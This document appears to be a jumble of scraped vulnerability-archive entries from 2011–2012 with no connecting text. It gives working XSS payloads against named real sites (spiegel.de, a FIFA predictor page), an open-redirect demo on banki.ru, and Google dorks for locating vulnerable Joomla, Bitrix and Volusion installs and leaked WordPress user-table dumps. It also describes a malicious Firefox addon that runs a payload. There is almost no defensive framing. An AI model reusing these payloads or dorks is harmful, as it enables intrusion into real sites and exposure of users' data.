Date submitted: 14/12/2011
Date published: 10/05/2012

URL:
http://pastebin.com/mHjUghPv

by
Atmon3r

URL: http://www.spiegel.de/artikelversand/online/a-823270-de.html

POST: f.emailempfang=alert(navigator.userAgent)

by
watt

Exploit Title: joomla component (com_estateagent) SQL injection Vulnerability
Date: 10/04/2012
Author: xDarkSton3x
Category:: webapps
Google dork: inurl:"com_estateagent"

This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page with. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.

Domain:
de.predictor.fifa.com
URL:
hxxp://de.predictor.fifa.com/M/stats.mc?phase=2%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(%27XSS%20By%20Tur
KPoweR%20-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20:D%27)%3B%3C/ScRiPt%3E%3Ch1%3EXSS%20By%20TurKPoweR%2
0-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20%20:D%3C/h1%3E%3C/marquee%3E

by
TurKPoweR

Demo:
http://www.banki.ru/bitrix/rku.php?id=829&goto=http://xxxxx.com

Google Dork:
inurl:bitrix/rk.php

by
Sony and Flexxpoint

Dork:
intext:INSERT INTO 'wp_users` VALUES(1, 'ADMIN'," intext:dump filetype:sql

Software Link:
http://www.volusion.com/
Google Dorks:
inurl:livechat.aspx?ID= intext:volusion or intext:powered by volusion

by
Sony